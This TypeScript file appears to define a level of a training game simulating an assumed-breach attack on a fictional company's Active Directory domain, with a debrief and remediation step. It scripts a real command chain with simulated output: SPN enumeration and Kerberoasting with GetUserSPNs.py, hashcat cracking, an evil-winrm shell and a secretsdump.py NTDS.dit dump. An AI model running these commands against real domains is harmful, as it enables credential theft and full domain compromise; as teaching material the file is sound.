import type { ChainDef } from "../../types";
import { match, strictCmd } from "../../engine";

const IP = "192.0.2.240";
const DOMAIN = "ashgrove.local";

export const ghostLevel4: ChainDef = {
  id: "ghost-4",
  difficulty: "ghost",
  order: 4,
  points: 300,
  title: "Backup Plan",
  codename: "GHOST ASSESSMENT — BACKUP PLAN",
  summary: "One low-privilege domain account. Full domain compromise is a chain of small, individually boring misconfigurations away.",
  briefing: [
    `TARGET: Ashgrove Manufacturing Corp — domain controller — ${IP}`,
    `DOMAIN: ${DOMAIN}`,
    "YOU HAVE: a legitimate, low-privilege domain account — analyst1 : Summer2024!",
    "",
    "This is an assumed-breach assessment. Find out how far one ordinary account actually reaches",
    "inside this domain.",
  ],
  debrief: [
    "root cause chain: a service account with a Kerberos SPN set (Kerberoasting target, CWE-522) had",
    "a weak, crackable password; that account turned out to be a member of Backup Operators, a",
    "built-in group whose SeBackupPrivilege can read any file on the domain controller regardless of",
    "ACLs — including the NTDS.dit database that holds every account's password hash. One weak",
    "service account password was the entire distance between a low-privilege foothold and the",
    "domain's complete credential set.",
    "",
    "ASHGROVE MANUFACTURING CORP: SECURED.",
  ],
  nodes: [
    {
      id: "ashgrove",
      randomizableSecrets: ["Summer2024!", "Br0nzeF@wn2019"],
      org: "Ashgrove Manufacturing Corp",
      city: "Ashgrove",
      state: "PA",
      coords: { x: 79.6, y: 23.1 },
      ip: IP,
      tagline: "Industrial manufacturing — Active Directory domain",
      briefing: [`IP: ${IP}`, `DOMAIN: ${DOMAIN}`, "No further information provided."],
      initialPrompt: "op@breachline:~$",
      motd: [],
      objectives: [
        { id: "recon", label: "Enumerate the domain controller's services", tactic: "Reconnaissance" },
        {
          id: "enum-spns",
          label: "Enumerate accounts with Kerberos SPNs set",
          tactic: "Discovery",
          requires: ["recon"],
        },
        { id: "kerberoast", label: "Request a crackable service ticket for that account", tactic: "Credential Access", requires: ["enum-spns"] },
        { id: "crack", label: "Recover the plaintext password offline", tactic: "Credential Access", requires: ["kerberoast"] },
        { id: "lateral", label: "Authenticate to the domain as the service account", tactic: "Lateral Movement", requires: ["crack"] },
        {
          id: "discover-priv",
          label: "Discover the service account's privileged group membership",
          tactic: "Discovery",
          requires: ["lateral"],
        },
        {
          id: "privesc",
          label: "Abuse that privilege to dump every domain credential",
          tactic: "Privilege Escalation",
          requires: ["discover-priv"],
        },
        { id: "secure", label: "Rotate every exposed credential and remove the backup privilege", tactic: "Remediation", requires: ["privesc"] },
      ],
      hints: [
        "any domain account can query the directory for which other accounts have a Kerberos service principal name set — those are the only ones you can Kerberoast at all.",
        "a requested service ticket is encrypted with the target account's own password hash. that's crackable entirely offline, with no further contact against the domain — the account never has to be online for the crack itself.",
        "once you're that account, don't assume its access ends at 'ordinary user.' check what groups it's actually in — some built-in groups carry privileges that have nothing to do with the account's job title.",
      ],
      debrief: [],
      commands: [
        strictCmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT     STATE SERVICE VERSION",
              "88/tcp   open  kerberos-sec",
              "389/tcp  open  ldap",
              "445/tcp  open  microsoft-ds",
              "3389/tcp open  ms-wbt-server",
              "5985/tcp open  http (WinRM)",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 4.85 seconds",
            ],
          }),
        }),
        strictCmd({
          id: "GetUserSPNs-enum",
          tool: "GetUserSPNs.py",
          requires: [DOMAIN + "/analyst1", "-dc-ip"],
          forbids: ["-request"],
          help: `GetUserSPNs.py ${DOMAIN}/analyst1:'Summer2024!' -dc-ip <ip>`,
          requiresFlags: ["scanned"],
          run: () => ({
            completesObjective: "enum-spns",
            tone: "success",
            setsFlags: ["found_spn"],
            note: "Ashgrove Manufacturing Corp — Kerberoastable account: svc_backup (SPN: MSSQLSvc/ashgrove-sql.ashgrove.local:1433)",
            output: [
              "ServicePrincipalName                          Name         MemberOf",
              "MSSQLSvc/ashgrove-sql.ashgrove.local:1433      svc_backup   -",
              "",
              "[+] one account with an SPN set — everything else in the domain is unroastable.",
            ],
          }),
        }),
        strictCmd({
          id: "GetUserSPNs-request",
          tool: "GetUserSPNs.py",
          requires: [DOMAIN + "/analyst1", "-dc-ip", "-request"],
          help: `GetUserSPNs.py ${DOMAIN}/analyst1:'Summer2024!' -dc-ip <ip> -request`,
          requiresFlags: ["found_spn"],
          run: () => ({
            completesObjective: "kerberoast",
            tone: "success",
            setsFlags: ["have_hash"],
            note: "Ashgrove — svc_backup Kerberos TGS-REP hash (etype 23) retrieved for offline cracking",
            output: [
              "$krb5tgs$23$*svc_backup$ASHGROVE.LOCAL$MSSQLSvc/ashgrove-sql.ashgrove.local~1433*$...(truncated)...",
              "",
              "[+] service ticket requested and saved. no further contact with the domain is needed to crack it.",
            ],
          }),
        }),
        strictCmd({
          id: "hashcat-crack",
          tool: "hashcat",
          requires: ["-m 13100"],
          help: "hashcat -m 13100 hash.txt rockyou.txt",
          requiresFlags: ["have_hash"],
          run: () => ({
            completesObjective: "crack",
            tone: "success",
            setsFlags: ["have_password"],
            note: "Ashgrove — svc_backup password cracked: Br0nzeF@wn2019",
            output: [
              "$krb5tgs$23$*svc_backup$...:Br0nzeF@wn2019",
              "",
              "Session..........: hashcat",
              "Status...........: Cracked",
            ],
          }),
        }),
        strictCmd({
          id: "evil-winrm",
          tool: "evil-winrm",
          requires: ["-u svc_backup", "-p"],
          help: `evil-winrm -i <ip> -u svc_backup -p 'Br0nzeF@wn2019'`,
          requiresFlags: ["have_password"],
          run: () => ({
            completesObjective: "lateral",
            tone: "success",
            setsFlags: ["shell_access"],
            promptAfter: "*Evil-WinRM* PS C:\\Users\\svc_backup\\Documents>",
            output: ["Evil-WinRM shell v3.5", "", "Info: Established user session as ashgrove\\svc_backup"],
          }),
        }),
        strictCmd({
          id: "whoami-groups",
          tool: "whoami",
          requires: ["/groups"],
          help: "whoami /groups",
          requiresFlags: ["shell_access"],
          run: () => ({
            completesObjective: "discover-priv",
            tone: "success",
            setsFlags: ["saw_backup_ops"],
            note: "Ashgrove — svc_backup is a member of BUILTIN\\Backup Operators (SeBackupPrivilege on the DC)",
            output: [
              "GROUP INFORMATION",
              "-----------------",
              "ASHGROVE\\Domain Users",
              "BUILTIN\\Backup Operators",
              "",
              "[!] Backup Operators can read any file on this host, ACLs included — that's how NTDS.dit",
              "    stays reachable without ever needing Domain Admin.",
            ],
          }),
        }),
        strictCmd({
          id: "secretsdump",
          tool: "secretsdump.py",
          requires: ["-use-vss", DOMAIN + "/svc_backup"],
          help: `secretsdump.py -use-vss ${DOMAIN}/svc_backup:'Br0nzeF@wn2019'@<ip>`,
          requiresFlags: ["saw_backup_ops"],
          run: () => ({
            completesObjective: "privesc",
            tone: "success",
            note: "Ashgrove Manufacturing Corp — Administrator NTLM hash recovered via VSS-based NTDS.dit dump: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
            output: [
              "[*] Using the DRSUAPI method to get NTDS.dit secrets",
              "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
              "svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:9f5e2b...:::",
              "",
              "[+] every credential hash in the domain, recovered from Backup Operators membership on one",
              "    service account with a weak password.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system",
          requiresObjectives: ["privesc"],
          deniedOutput: ["confirm the full scope of the compromise before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] rotated svc_backup's password to a long, random, non-crackable value",
              "[+] removed svc_backup from Backup Operators; scoped its access to only what the SQL",
              "    service actually needs",
              "[+] rotated every credential recovered from the NTDS.dit dump, domain-wide",
              "",
              "ASHGROVE MANUFACTURING CORP: SECURED",
            ],
          }),
        },
      ],
    },
  ],
};
